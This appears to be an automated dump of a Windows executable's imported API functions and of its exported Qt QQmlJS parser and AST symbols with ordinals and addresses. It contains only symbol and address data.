                                                                                                          GDI32.dllGetBitmapBits, GetCharABCWidthsW, GetCharABCWidthsFloatW, GetGlyphOutlineW, GetOutlineTextMetricsW, GetTextExtentPoint32W, GetCharABCWidthsI, SetBkMode, SetGraphicsMode, SetTextColor, SetTextAlign, SetWorldTransform, ExtTextOutW, GetTextFaceW, CreateBitmap, GetDIBits, CreateRectRgn, DeleteObject, GetRegionData, BitBlt, CreateCompatibleDC, CreateFontIndirectW, DeleteDC, SelectObject, CreateDIBSection, SelectClipRgn, GdiFlush, OffsetRgn, GetDeviceCaps, CreateCompatibleBitmap, CreateDCW, EnumFontFamiliesExW, GetFontData, GetStockObject, AddFontResourceExW, RemoveFontResourceExW, AddFontMemResourceEx, RemoveFontMemResourceEx, GetTextMetricsW, CombineRgn, GetObjectW
                                                                                                          OLEAUT32.dllSystemTimeToVariantTime, VariantChangeType, VariantInit, SysStringLen, SysAllocStringLen, SysFreeString, VariantCopy, VariantClear, SysAllocStringByteLen, SysAllocString
                                                                                                          IMM32.dllImmGetDefaultIMEWnd, ImmReleaseContext, ImmAssociateContext, ImmGetCompositionStringW, ImmNotifyIME, ImmSetCompositionWindow, ImmSetCandidateWindow, ImmGetVirtualKey, ImmGetContext
                                                                                                          WINMM.dllPlaySoundW
                                                                                                          KERNEL32.dllLocalFree, FormatMessageW, GetFileAttributesExW, GetLongPathNameW, GetShortPathNameW, GetEnvironmentVariableW, OpenProcess, GetLogicalDriveStringsA, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FindFirstVolumeW, FindNextVolumeW, FindVolumeClose, GetDiskFreeSpaceExA, GetDriveTypeA, GetDriveTypeW, GetVolumePathNamesForVolumeNameW, SetErrorMode, WaitForSingleObject, TerminateProcess, GetLastError, GetProcAddress, LoadLibraryW, FileTimeToSystemTime, CreateFileW, DeviceIoControl, FlushFileBuffers, LockFile, UnlockFile, WriteFile, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFileInformationByHandle, GetFileSize, ReadFile, SetEndOfFile, SetFilePointer, SetFileTime, CompareFileTime, GetVersionExW, VirtualAlloc, VirtualFree, SearchPathW, CreateDirectoryW, DeleteFileW, GetFullPathNameW, GetTempFileNameW, RemoveDirectoryW, SetFileAttributesW, GetTempPathW, GetSystemDirectoryW, GetWindowsDirectoryW, lstrlenW, MoveFileW, FindClose, FindCloseChangeNotification, FindFirstChangeNotificationW, FindFirstFileW, FindNextFileW, MultiByteToWideChar, GetFileType, FreeLibrary, GetModuleFileNameW, LoadLibraryExW, GetSystemTime, FileTimeToDosDateTime, SystemTimeToFileTime, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetSystemInfo, GetModuleHandleW, InitializeCriticalSection, GetStdHandle, ResetEvent, ReleaseSemaphore, CreateEventW, CreateSemaphoreW, WaitForMultipleObjects, GetVolumeInformationW, lstrcmpW, GetTimeZoneInformation, VirtualProtect, DisconnectNamedPipe, WaitNamedPipeW, GlobalFree, ConnectNamedPipe, CreateNamedPipeW, CreateProcessW, GetCurrentProcess, Sleep, SetHandleInformation, IsValidLanguageGroup, IsValidLocale, ExpandEnvironmentStringsW, GetUserDefaultLangID, CheckRemoteDebuggerPresent, GlobalAlloc, GlobalLock, GlobalUnlock, GetLocaleInfoW, GlobalSize, GetCurrentProcessId, ExitProcess, VerSetConditionMask, GetNativeSystemInfo, VerifyVersionInfoW, OutputDebugStringW, CompareStringW, GetUserDefaultLCID, GetLocalTime, DuplicateHandle, SwitchToThread, CreateThread, GetCurrentThread, GetCurrentThreadId, SetThreadPriority, GetThreadPriority, TerminateThread, ResumeThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetExitCodeProcess, QueryPerformanceCounter, QueryPerformanceFrequency, GetTickCount, PeekNamedPipe, CancelIo, GetModuleHandleA, GetStartupInfoW, GetFileAttributesW, GetLogicalDrives, CopyFileW, SystemTimeToTzSpecificLocalTime, SetFilePointerEx, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, MoveFileExW, GetDateFormatW, GetTimeFormatW, GetCurrencyFormatW, GetUserDefaultUILanguage, FindFirstFileExW, ReleaseMutex, CreateMutexW, FindNextChangeNotification, CreateIoCompletionPort, GetQueuedCompletionStatus, PostQueuedCompletionStatus, GetGeoInfoW, GetUserGeoID, CreateProcessA, LCMapStringW, InitializeCriticalSectionAndSpinCount, SetLastError, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCPInfo, SetStdHandle, GetConsoleCP, ReadConsoleW, GetConsoleMode, AreFileApisANSI, GetModuleHandleExW, HeapReAlloc, ExitThread, IsProcessorFeaturePresent, IsDebuggerPresent, HeapAlloc, GetCommandLineA, RtlUnwind, RaiseException, HeapFree, GetStringTypeW, DecodePointer, EncodePointer, EnumSystemLocalesW, HeapSize, CloseHandle, GetCommandLineW, GetConsoleWindow, SetConsoleMode, AllocConsole, AttachConsole, FreeConsole, SetConsoleScreenBufferSize, GetOverlappedResult, GetLargestConsoleWindowSize, GetProcessHeap, GetModuleFileNameA, GetSystemTimeAsFileTime, IsValidCodePage, GetACP, GetOEMCP, SetEnvironmentVariableA, WriteConsoleW, SetEvent, WideCharToMultiByte
                                                                                                          USER32.dllHideCaret, SetCaretPos, PeekMessageW, IsZoomed, GetKeyState, GetKeyboardState, ToAscii, ToUnicode, MapVirtualKeyW, GetMenu, TrackPopupMenuEx, SetMenuItemInfoW, NotifyWinEvent, RegisterClassW, GetClipboardFormatNameW, SetCursorPos, GetCursor, CreateCursor, CreateIconIndirect, GetCursorInfo, TrackMouseEvent, GetMessageExtraInfo, GetWindowTextW, RealGetWindowClassW, MessageBoxW, PostThreadMessageW, TranslateMessage, DispatchMessageW, GetQueueStatus, MsgWaitForMultipleObjectsEx, SetTimer, KillTimer, SetWindowsHookExW, UnhookWindowsHookEx, CallNextHookEx, CharNextExA, DestroyCaret, CreateCaret, GetIconInfo, DestroyCursor, LoadCursorW, GetAsyncKeyState, RegisterClipboardFormatW, ChangeClipboardChain, SetClipboardViewer, LoadIconW, EnumDisplayMonitors, GetMonitorInfoW, GetSysColorBrush, ChildWindowFromPointEx, GetCursorPos, GetClientRect, GetFocus, RegisterClassExW, GetClassInfoW, UnregisterClassW, GetKeyboardLayoutList, GetAncestor, SetParent, GetParent, GetDesktopWindow, DrawMenuBar, GetSystemMenu, RemoveMenu, EnumWindows, GetWindowThreadProcessId, SendMessageTimeoutW, CharUpperW, GetWindowRect, SetWindowTextW, InvalidateRect, GetUpdateRect, EndPaint, BeginPaint, SetForegroundWindow, GetForegroundWindow, ReleaseCapture, SetCapture, GetCapture, SetFocus, IsIconic, IsWindowVisible, SetWindowPlacement, GetWindowPlacement, SetWindowPos, MoveWindow, FlashWindowEx, ShowWindow, IsChild, CreateWindowExW, SendMessageW, MessageBeep, GetCaretBlinkTime, CharLowerW, GetSystemMetrics, DestroyIcon, LoadImageW, RegisterWindowMessageW, GetDC, ReleaseDC, EnableMenuItem, DefWindowProcW, AdjustWindowRectEx, DrawIconEx, SystemParametersInfoW, GetSysColor, SetWindowRgn, DestroyWindow, GetDoubleClickTime, SetWindowLongW, GetWindowLongW, ScreenToClient, ClientToScreen, SetCursor, PostMessageW
                                                                                                          SHELL32.dllSHGetSpecialFolderPathW, CommandLineToArgvW, SHBrowseForFolderW, SHGetMalloc, ShellExecuteW, SHGetFileInfoW, SHParseDisplayName, SHGetPathFromIDListW, SHChangeNotify, SHGetFolderLocation, ShellExecuteExW, SHGetFolderPathW
                                                                                                          ole32.dllReleaseStgMedium, DoDragDrop, OleIsCurrentClipboard, OleFlushClipboard, OleGetClipboard, CoTaskMemAlloc, OleSetClipboard, CoCreateGuid, OleUninitialize, OleInitialize, RevokeDragDrop, RegisterDragDrop, CoLockObjectExternal, CoTaskMemFree, CoCreateInstance, CoInitialize, CoUninitialize, CoGetMalloc
                                                                                                          ADVAPI32.dllAllocateAndInitializeSid, RegSetValueExW, RegQueryInfoKeyW, RegFlushKey, RegEnumValueW, CheckTokenMembership, FreeSid, OpenProcessToken, AddAccessAllowedAce, GetLengthSid, GetTokenInformation, InitializeAcl, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, RegCloseKey, RegOpenKeyExW, RegQueryValueExW, CopySid, RegCreateKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyExW
                                                                                                          WS2_32.dllWSASocketW, inet_addr, gethostbyaddr, gethostbyname, WSAAsyncSelect, WSARecv, WSANtohs, WSANtohl, WSAIoctl, WSAHtons, WSAHtonl, WSAConnect, WSASendTo, WSAGetLastError, WSACleanup, WSAStartup, setsockopt, select, ntohl, listen, getsockname, getpeername, closesocket, bind, __WSAFDIsSet, getsockopt, htonl, WSASend, WSAAccept, WSARecvFrom
                                                                                                          MPR.dllWNetGetUniversalNameA
                                                                                                          NameOrdinalAddress
                                                                                                          ??0ArgumentList@AST@QQmlJS@@QAE@PAV012@PAVExpressionNode@12@@Z10x7ae050
                                                                                                          ??0ArgumentList@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z20x7ae0a0
                                                                                                          ??0ArrayLiteral@AST@QQmlJS@@QAE@PAVElementList@12@@Z30x7ae0e0
                                                                                                          ??0ArrayLiteral@AST@QQmlJS@@QAE@PAVElementList@12@PAVElision@12@@Z40x7ae160
                                                                                                          ??0ArrayLiteral@AST@QQmlJS@@QAE@PAVElision@12@@Z50x7ae1e0
                                                                                                          ??0ArrayMemberExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@0@Z60x7ae260
                                                                                                          ??0BinaryExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@H0@Z70x7ae2c0
                                                                                                          ??0Block@AST@QQmlJS@@QAE@PAVStatementList@12@@Z80x7ae310
                                                                                                          ??0BreakStatement@AST@QQmlJS@@QAE@ABVQStringRef@@@Z90x7ae370
                                                                                                          ??0CallExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@PAVArgumentList@12@@Z100x7ae400
                                                                                                          ??0CaseBlock@AST@QQmlJS@@QAE@PAVCaseClauses@12@PAVDefaultClause@12@0@Z110x7ae460
                                                                                                          ??0CaseClause@AST@QQmlJS@@QAE@PAVExpressionNode@12@PAVStatementList@12@@Z120x7ae4c0
                                                                                                          ??0CaseClauses@AST@QQmlJS@@QAE@PAV012@PAVCaseClause@12@@Z130x7ae520
                                                                                                          ??0CaseClauses@AST@QQmlJS@@QAE@PAVCaseClause@12@@Z140x7ae550
                                                                                                          ??0Catch@AST@QQmlJS@@QAE@ABVQStringRef@@PAVBlock@12@@Z150x7ae570
                                                                                                          ??0ConditionalExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@00@Z160x7ae620
                                                                                                          ??0ContinueStatement@AST@QQmlJS@@QAE@ABVQStringRef@@@Z170x7ae680
                                                                                                          ??0DebuggerStatement@AST@QQmlJS@@QAE@XZ180x7ae710
                                                                                                          ??0DefaultClause@AST@QQmlJS@@QAE@PAVStatementList@12@@Z190x7ae760
                                                                                                          ??0DeleteExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z200x7ae7c0
                                                                                                          ??0DiagnosticMessage@QQmlJS@@QAE@ABV01@@Z210x7ae800
                                                                                                          ??0DiagnosticMessage@QQmlJS@@QAE@W4Kind@01@ABVSourceLocation@AST@1@ABVQString@@@Z220x7ae840
                                                                                                          ??0DiagnosticMessage@QQmlJS@@QAE@XZ230x7ae880
                                                                                                          ??0Directives@QQmlJS@@QAE@ABV01@@Z240x7c6850
                                                                                                          ??0Directives@QQmlJS@@QAE@XZ250x7c6860
                                                                                                          ??0DoWhileStatement@AST@QQmlJS@@QAE@PAVStatement@12@PAVExpressionNode@12@@Z260x7ae8b0
                                                                                                          ??0ElementList@AST@QQmlJS@@QAE@PAV012@PAVElision@12@PAVExpressionNode@12@@Z270x7ae960
                                                                                                          ??0ElementList@AST@QQmlJS@@QAE@PAVElision@12@PAVExpressionNode@12@@Z280x7ae9b0
                                                                                                          ??0Elision@AST@QQmlJS@@QAE@PAV012@@Z290x7ae9f0
                                                                                                          ??0Elision@AST@QQmlJS@@QAE@XZ300x7aea30
                                                                                                          ??0EmptyStatement@AST@QQmlJS@@QAE@XZ310x7aea60
                                                                                                          ??0Engine@QQmlJS@@QAE@XZ320x8b0920
                                                                                                          ??0Expression@AST@QQmlJS@@QAE@PAVExpressionNode@12@0@Z330x7aead0
                                                                                                          ??0ExpressionNode@AST@QQmlJS@@QAE@XZ340x7aeb10
                                                                                                          ??0ExpressionStatement@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z350x7aeb20
                                                                                                          ??0FalseLiteral@AST@QQmlJS@@QAE@XZ360x7aeb60
                                                                                                          ??0FieldMemberExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@ABVQStringRef@@@Z370x7aeb90
                                                                                                          ??0Finally@AST@QQmlJS@@QAE@PAVBlock@12@@Z380x7aec00
                                                                                                          ??0ForEachStatement@AST@QQmlJS@@QAE@PAVExpressionNode@12@0PAVStatement@12@@Z390x7aec40
                                                                                                          ??0ForStatement@AST@QQmlJS@@QAE@PAVExpressionNode@12@00PAVStatement@12@@Z400x7aece0
                                                                                                          ??0FormalParameterList@AST@QQmlJS@@QAE@ABVQStringRef@@@Z410x7aeda0
                                                                                                          ??0FormalParameterList@AST@QQmlJS@@QAE@PAV012@ABVQStringRef@@@Z420x7aee10
                                                                                                          ??0FunctionBody@AST@QQmlJS@@QAE@PAVSourceElements@12@@Z430x7aee90
                                                                                                          ??0FunctionDeclaration@AST@QQmlJS@@QAE@ABVQStringRef@@PAVFormalParameterList@12@PAVFunctionBody@12@@Z440x7aeeb0
                                                                                                          ??0FunctionExpression@AST@QQmlJS@@QAE@ABVQStringRef@@PAVFormalParameterList@12@PAVFunctionBody@12@@Z450x7aeee0
                                                                                                          ??0FunctionSourceElement@AST@QQmlJS@@QAE@PAVFunctionDeclaration@12@@Z460x7aefd0
                                                                                                          ??0IdentifierExpression@AST@QQmlJS@@QAE@ABVQStringRef@@@Z470x7af000
                                                                                                          ??0IdentifierPropertyName@AST@QQmlJS@@QAE@ABVQStringRef@@@Z480x7af050
                                                                                                          ??0IfStatement@AST@QQmlJS@@QAE@PAVExpressionNode@12@PAVStatement@12@1@Z490x7af0a0
                                                                                                          ??0LabelledStatement@AST@QQmlJS@@QAE@ABVQStringRef@@PAVStatement@12@@Z500x7af140
                                                                                                          ??0Lexer@QQmlJS@@QAE@ABV01@@Z510x7c6870
                                                                                                          ??0Lexer@QQmlJS@@QAE@PAVEngine@1@@Z520x8b0da0
                                                                                                          ??0LocalForEachStatement@AST@QQmlJS@@QAE@PAVVariableDeclaration@12@PAVExpressionNode@12@PAVStatement@12@@Z530x7af1b0
                                                                                                          ??0LocalForStatement@AST@QQmlJS@@QAE@PAVVariableDeclarationList@12@PAVExpressionNode@12@1PAVStatement@12@@Z540x7af270
                                                                                                          ??0Managed@QQmlJS@@QAE@XZ550x8ac730
                                                                                                          ??0MemoryPool@QQmlJS@@QAE@XZ560x7af350
                                                                                                          ??0NestedExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z570x7af380
                                                                                                          ??0NewExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z580x7af3e0
                                                                                                          ??0NewMemberExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@PAVArgumentList@12@@Z590x7af420
                                                                                                          ??0Node@AST@QQmlJS@@QAE@XZ600x7af4a0
                                                                                                          ??0NotExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z610x7af4b0
                                                                                                          ??0NullExpression@AST@QQmlJS@@QAE@XZ620x7af4f0
                                                                                                          ??0NumericLiteral@AST@QQmlJS@@QAE@N@Z630x7af520
                                                                                                          ??0NumericLiteralPropertyName@AST@QQmlJS@@QAE@N@Z640x7af560
                                                                                                          ??0ObjectLiteral@AST@QQmlJS@@QAE@PAVPropertyAssignmentList@12@@Z650x7af5a0
                                                                                                          ??0ObjectLiteral@AST@QQmlJS@@QAE@XZ660x7af600
                                                                                                          ??0Parser@QQmlJS@@QAE@ABV01@@Z670x7c6980
                                                                                                          ??0Parser@QQmlJS@@QAE@PAVEngine@1@@Z680x88ca10
                                                                                                          ??0PostDecrementExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z690x7af650
                                                                                                          ??0PostIncrementExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z700x7af690
                                                                                                          ??0PreDecrementExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z710x7af6d0
                                                                                                          ??0PreIncrementExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z720x7af710
                                                                                                          ??0Program@AST@QQmlJS@@QAE@PAVSourceElements@12@@Z730x7af750
                                                                                                          ??0PropertyAssignment@AST@QQmlJS@@QAE@PAVPropertyName@12@@Z740x7af770
                                                                                                          ??0PropertyAssignmentList@AST@QQmlJS@@QAE@PAV012@PAVPropertyAssignment@12@@Z750x7af790
                                                                                                          ??0PropertyAssignmentList@AST@QQmlJS@@QAE@PAVPropertyAssignment@12@@Z760x7af7e0
                                                                                                          ??0PropertyGetterSetter@AST@QQmlJS@@QAE@PAVPropertyName@12@PAVFormalParameterList@12@PAVFunctionBody@12@@Z770x7af820
                                                                                                          ??0PropertyGetterSetter@AST@QQmlJS@@QAE@PAVPropertyName@12@PAVFunctionBody@12@@Z780x7af8e0
                                                                                                          ??0PropertyName@AST@QQmlJS@@QAE@XZ790x7af9a0
                                                                                                          ??0PropertyNameAndValue@AST@QQmlJS@@QAE@PAVPropertyName@12@PAVExpressionNode@12@@Z800x7af9d0
                                                                                                          ??0RegExpLiteral@AST@QQmlJS@@QAE@ABVQStringRef@@H@Z810x7afcb0
                                                                                                          ??0ReturnStatement@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z820x7afd10
                                                                                                          ??0SourceElement@AST@QQmlJS@@QAE@XZ830x7afd70
                                                                                                          ??0SourceElements@AST@QQmlJS@@QAE@PAV012@PAVSourceElement@12@@Z840x7afd80
                                                                                                          ??0SourceElements@AST@QQmlJS@@QAE@PAVSourceElement@12@@Z850x7afdb0
                                                                                                          ??0Statement@AST@QQmlJS@@QAE@XZ860x7afdd0
                                                                                                          ??0StatementList@AST@QQmlJS@@QAE@PAV012@PAVStatement@12@@Z870x7afde0
                                                                                                          ??0StatementList@AST@QQmlJS@@QAE@PAVStatement@12@@Z880x7afe10
                                                                                                          ??0StatementSourceElement@AST@QQmlJS@@QAE@PAVStatement@12@@Z890x7afe30
                                                                                                          ??0StringLiteral@AST@QQmlJS@@QAE@ABVQStringRef@@@Z900x7afe50
                                                                                                          ??0StringLiteralPropertyName@AST@QQmlJS@@QAE@ABVQStringRef@@@Z910x7afea0
                                                                                                          ??0SwitchStatement@AST@QQmlJS@@QAE@PAVExpressionNode@12@PAVCaseBlock@12@@Z920x7afef0
                                                                                                          ??0ThisExpression@AST@QQmlJS@@QAE@XZ930x7aff70
                                                                                                          ??0ThrowStatement@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z940x7affa0
                                                                                                          ??0TildeExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z950x7b0000
                                                                                                          ??0TrueLiteral@AST@QQmlJS@@QAE@XZ960x7b0040
                                                                                                          ??0TryStatement@AST@QQmlJS@@QAE@PAVStatement@12@PAVCatch@12@@Z970x7b0070
                                                                                                          ??0TryStatement@AST@QQmlJS@@QAE@PAVStatement@12@PAVCatch@12@PAVFinally@12@@Z980x7b00c0
                                                                                                          ??0TryStatement@AST@QQmlJS@@QAE@PAVStatement@12@PAVFinally@12@@Z990x7b0110
                                                                                                          ??0TypeOfExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z1000x7b0160
                                                                                                          ??0UiArrayBinding@AST@QQmlJS@@QAE@PAVUiQualifiedId@12@PAVUiArrayMemberList@12@@Z1010x7b01a0
                                                                                                          ??0UiArrayMemberList@AST@QQmlJS@@QAE@PAV012@PAVUiObjectMember@12@@Z1020x7b0220
                                                                                                          ??0UiArrayMemberList@AST@QQmlJS@@QAE@PAVUiObjectMember@12@@Z1030x7b0270
                                                                                                          ??0UiHeaderItemList@AST@QQmlJS@@QAE@PAV012@PAVUiImport@12@@Z1040x7b02b0
                                                                                                          ??0UiHeaderItemList@AST@QQmlJS@@QAE@PAV012@PAVUiPragma@12@@Z1050x7b02b0
                                                                                                          ??0UiHeaderItemList@AST@QQmlJS@@QAE@PAVUiImport@12@@Z1060x7b02e0
                                                                                                          ??0UiHeaderItemList@AST@QQmlJS@@QAE@PAVUiPragma@12@@Z1070x7b02e0
                                                                                                          ??0UiImport@AST@QQmlJS@@QAE@ABVQStringRef@@@Z1080x7b0300
                                                                                                          ??0UiImport@AST@QQmlJS@@QAE@PAVUiQualifiedId@12@@Z1090x7b0400
                                                                                                          ??0UiObjectBinding@AST@QQmlJS@@QAE@PAVUiQualifiedId@12@0PAVUiObjectInitializer@12@@Z1100x7b04f0
                                                                                                          ??0UiObjectDefinition@AST@QQmlJS@@QAE@PAVUiQualifiedId@12@PAVUiObjectInitializer@12@@Z1110x7b0540
                                                                                                          ??0UiObjectInitializer@AST@QQmlJS@@QAE@PAVUiObjectMemberList@12@@Z1120x7b0560
                                                                                                          ??0UiObjectMember@AST@QQmlJS@@QAE@XZ1130x7b05c0
                                                                                                          ??0UiObjectMemberList@AST@QQmlJS@@QAE@PAV012@PAVUiObjectMember@12@@Z1140x7b05d0
                                                                                                          ??0UiObjectMemberList@AST@QQmlJS@@QAE@PAVUiObjectMember@12@@Z1150x7b0600
                                                                                                          ??0UiParameterList@AST@QQmlJS@@QAE@ABVQStringRef@@0@Z1160x7b0620
                                                                                                          ??0UiParameterList@AST@QQmlJS@@QAE@PAV012@ABVQStringRef@@1@Z1170x7b06c0
                                                                                                          ??0UiPragma@AST@QQmlJS@@QAE@PAVUiQualifiedPragmaId@12@@Z1180x7b0770
                                                                                                          ??0UiProgram@AST@QQmlJS@@QAE@PAVUiHeaderItemList@12@PAVUiObjectMemberList@12@@Z1190x7b07d0
                                                                                                          ??0UiPublicMember@AST@QQmlJS@@QAE@ABVQStringRef@@0@Z1200x7b07f0
                                                                                                          ??0UiPublicMember@AST@QQmlJS@@QAE@ABVQStringRef@@0PAVStatement@12@@Z1210x7b0980
                                                                                                          ??0UiQualifiedId@AST@QQmlJS@@QAE@ABVQStringRef@@@Z1220x7b0b10
                                                                                                          ??0UiQualifiedId@AST@QQmlJS@@QAE@PAV012@ABVQStringRef@@@Z1230x7b0b60
                                                                                                          ??0UiQualifiedPragmaId@AST@QQmlJS@@QAE@ABVQStringRef@@@Z1240x7b0bc0
                                                                                                          ??0UiQualifiedPragmaId@AST@QQmlJS@@QAE@PAV012@ABVQStringRef@@@Z1250x7b0c10
                                                                                                          ??0UiScriptBinding@AST@QQmlJS@@QAE@PAVUiQualifiedId@12@PAVStatement@12@@Z1260x7b0c70
                                                                                                          ??0UiSourceElement@AST@QQmlJS@@QAE@PAVNode@12@@Z1270x7b0cb0
                                                                                                          ??0UnaryMinusExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z1280x7b0cd0
                                                                                                          ??0UnaryPlusExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z1290x7b0d10
                                                                                                          ??0VariableDeclaration@AST@QQmlJS@@QAE@ABVQStringRef@@PAVExpressionNode@12@@Z1300x7b0d50
                                                                                                          ??0VariableDeclarationList@AST@QQmlJS@@QAE@PAV012@PAVVariableDeclaration@12@@Z1310x7b0db0
                                                                                                          ??0VariableDeclarationList@AST@QQmlJS@@QAE@PAVVariableDeclaration@12@@Z1320x7b0e00
                                                                                                          ??0VariableStatement@AST@QQmlJS@@QAE@PAVVariableDeclarationList@12@@Z1330x7b0e40
                                                                                                          ??0Visitor@AST@QQmlJS@@QAE@ABV012@@Z1340x7b0ea0
                                                                                                          ??0Visitor@AST@QQmlJS@@QAE@XZ1350x7d2300
                                                                                                          ??0VoidExpression@AST@QQmlJS@@QAE@PAVExpressionNode@12@@Z1360x7b0eb0
                                                                                                          ??0WhileStatement@AST@QQmlJS@@QAE@PAVExpressionNode@12@PAVStatement@12@@Z1370x7b0ef0
                                                                                                          ??0WithStatement@AST@QQmlJS@@QAE@PAVExpressionNode@12@PAVStatement@12@@Z1380x7b0f70
                                                                                                          ??1ArgumentList@AST@QQmlJS@@UAE@XZ1390x7b0ff0
                                                                                                          ??1ArrayLiteral@AST@QQmlJS@@UAE@XZ1400x7b0ff0
                                                                                                          ??1ArrayMemberExpression@AST@QQmlJS@@UAE@XZ1410x7b0ff0
                                                                                                          ??1BinaryExpression@AST@QQmlJS@@UAE@XZ1420x7b0ff0
                                                                                                          ??1Block@AST@QQmlJS@@UAE@XZ1430x7b0ff0
                                                                                                          ??1BreakStatement@AST@QQmlJS@@UAE@XZ1440x7b0ff0
                                                                                                          ??1CallExpression@AST@QQmlJS@@UAE@XZ1450x7b0ff0
                                                                                                          ??1CaseBlock@AST@QQmlJS@@UAE@XZ1460x7b0ff0
                                                                                                          ??1CaseClause@AST@QQmlJS@@UAE@XZ1470x7b0ff0
                                                                                                          ??1CaseClauses@AST@QQmlJS@@UAE@XZ1480x7b0ff0
                                                                                                          ??1Catch@AST@QQmlJS@@UAE@XZ1490x7b0ff0
                                                                                                          ??1ConditionalExpression@AST@QQmlJS@@UAE@XZ1500x7b0ff0
                                                                                                          ??1ContinueStatement@AST@QQmlJS@@UAE@XZ1510x7b0ff0
                                                                                                          ??1DebuggerStatement@AST@QQmlJS@@UAE@XZ1520x7b0ff0
                                                                                                          ??1DefaultClause@AST@QQmlJS@@UAE@XZ1530x7b0ff0
                                                                                                          ??1DeleteExpression@AST@QQmlJS@@UAE@XZ1540x7b0ff0
                                                                                                          ??1DiagnosticMessage@QQmlJS@@QAE@XZ1550x7b1000
                                                                                                          ??1Directives@QQmlJS@@UAE@XZ1560x7c6b60
                                                                                                          ??1DoWhileStatement@AST@QQmlJS@@UAE@XZ1570x7b0ff0
                                                                                                          ??1ElementList@AST@QQmlJS@@UAE@XZ1580x7b0ff0
                                                                                                          ??1Elision@AST@QQmlJS@@UAE@XZ1590x7b0ff0
                                                                                                          ??1EmptyStatement@AST@QQmlJS@@UAE@XZ1600x7b0ff0
                                                                                                          ??1Engine@QQmlJS@@QAE@XZ1610x8b0970
                                                                                                          ??1Expression@AST@QQmlJS@@UAE@XZ1620x7b0ff0
                                                                                                          ??1ExpressionNode@AST@QQmlJS@@UAE@XZ1630x7b0ff0
                                                                                                          ??1ExpressionStatement@AST@QQmlJS@@UAE@XZ1640x7b0ff0
                                                                                                          ??1FalseLiteral@AST@QQmlJS@@UAE@XZ1650x7b0ff0
                                                                                                          ??1FieldMemberExpression@AST@QQmlJS@@UAE@XZ1660x7b0ff0
                                                                                                          ??1Finally@AST@QQmlJS@@UAE@XZ1670x7b0ff0
                                                                                                          ??1ForEachStatement@AST@QQmlJS@@UAE@XZ1680x7b0ff0
                                                                                                          ??1ForStatement@AST@QQmlJS@@UAE@XZ1690x7b0ff0
                                                                                                          ??1FormalParameterList@AST@QQmlJS@@UAE@XZ1700x7b0ff0
                                                                                                          ??1FunctionBody@AST@QQmlJS@@UAE@XZ1710x7b0ff0
                                                                                                          ??1FunctionDeclaration@AST@QQmlJS@@UAE@XZ1720x7b0ff0
                                                                                                          ??1FunctionExpression@AST@QQmlJS@@UAE@XZ1730x7b0ff0
                                                                                                          ??1FunctionSourceElement@AST@QQmlJS@@UAE@XZ1740x7b0ff0
                                                                                                          ??1IdentifierExpression@AST@QQmlJS@@UAE@XZ1750x7b0ff0
                                                                                                          ??1IdentifierPropertyName@AST@QQmlJS@@UAE@XZ1760x7b0ff0
                                                                                                          ??1IfStatement@AST@QQmlJS@@UAE@XZ1770x7b0ff0
                                                                                                          ??1LabelledStatement@AST@QQmlJS@@UAE@XZ1780x7b0ff0
                                                                                                          ??1Lexer@QQmlJS@@QAE@XZ1790x7c6b70
                                                                                                          ??1LocalForEachStatement@AST@QQmlJS@@UAE@XZ1800x7b0ff0
                                                                                                          ??1LocalForStatement@AST@QQmlJS@@UAE@XZ1810x7b0ff0
                                                                                                          ??1Managed@QQmlJS@@QAE@XZ1820x8e10b0
                                                                                                          ??1MemoryPool@QQmlJS@@QAE@XZ1830x7b1030
                                                                                                          ??1NestedExpression@AST@QQmlJS@@UAE@XZ1840x7b0ff0
                                                                                                          ??1NewExpression@AST@QQmlJS@@UAE@XZ1850x7b0ff0
                                                                                                          ??1NewMemberExpression@AST@QQmlJS@@UAE@XZ1860x7b0ff0
                                                                                                          ??1Node@AST@QQmlJS@@UAE@XZ1870x7b0ff0
                                                                                                          ??1NotExpression@AST@QQmlJS@@UAE@XZ1880x7b0ff0
                                                                                                          ??1NullExpression@AST@QQmlJS@@UAE@XZ1890x7b0ff0
                                                                                                          ??1NumericLiteral@AST@QQmlJS@@UAE@XZ1900x7b0ff0
                                                                                                          ??1NumericLiteralPropertyName@AST@QQmlJS@@UAE@XZ1910x7b0ff0
                                                                                                          ??1ObjectLiteral@AST@QQmlJS@@UAE@XZ1920x7b0ff0
                                                                                                          ??1Parser@QQmlJS@@QAE@XZ1930x88cb90
                                                                                                          ??1PostDecrementExpression@AST@QQmlJS@@UAE@XZ1940x7b0ff0
                                                                                                          ??1PostIncrementExpression@AST@QQmlJS@@UAE@XZ1950x7b0ff0
                                                                                                          ??1PreDecrementExpression@AST@QQmlJS@@UAE@XZ1960x7b0ff0
                                                                                                          ??1PreIncrementExpression@AST@QQmlJS@@UAE@XZ1970x7b0ff0
                                                                                                          ??1Program@AST@QQmlJS@@UAE@XZ1980x7b0ff0
